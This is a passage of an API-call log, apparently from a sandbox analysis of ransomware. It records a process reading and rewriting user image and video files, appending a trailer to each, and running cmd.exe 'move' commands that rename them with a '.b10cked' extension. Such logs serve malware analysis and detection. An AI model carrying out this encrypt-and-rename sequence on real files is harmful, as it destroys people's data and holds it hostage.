lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2a51 [0228.325] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2f39 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2f39 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.327] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x179b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.328] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x179b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-6043, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x179e [0228.328] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x179b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-6043, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x179e [0228.328] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x179b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x179b, lpOverlapped=0x0) returned 1 [0228.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LUKOkovEeIsTMf0.png", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0228.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LUKOkovEeIsTMf0.png", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LUKOkovEeIsTMf0.png", lpUsedDefaultChar=0x0) returned 19 [0228.333] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2f39 [0228.333] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.334] CloseHandle (hObject=0x1b4) returned 1 [0228.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG") returned 0x33 [0228.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.335] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8cc, dwThreadId=0x9c8)) returned 1 [0228.473] CloseHandle (hObject=0x120) returned 1 [0228.473] CloseHandle (hObject=0x1b4) returned 1 [0228.473] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.473] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.473] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.474] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.474] ReleaseMutex (hMutex=0xf8) returned 1 [0228.474] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28526332393) returned 1 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xd786 [0228.476] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xdc6e [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xdc6e [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.478] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6e36, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6e36, lpOverlapped=0x0) returned 1 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x6e36, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x6e36, lpOverlapped=0x0) returned 1 [0228.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-28214, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e38 [0228.479] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6e36, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6e36, lpOverlapped=0x0) returned 1 [0228.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-28214, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e38 [0228.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x6e36, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x6e36, lpOverlapped=0x0) returned 1 [0228.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OXP9rCEqmjhd9gNfz.avi", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0228.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OXP9rCEqmjhd9gNfz.avi", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXP9rCEqmjhd9gNfz.avi", lpUsedDefaultChar=0x0) returned 21 [0228.485] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xdc6e [0228.485] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.485] CloseHandle (hObject=0x1b4) returned 1 [0228.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI") returned 0x33 [0228.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.486] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc4, dwThreadId=0x7b8)) returned 1 [0228.488] CloseHandle (hObject=0x120) returned 1 [0228.488] CloseHandle (hObject=0x1b4) returned 1 [0228.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.488] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.488] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.488] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28527843157) returned 1 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer 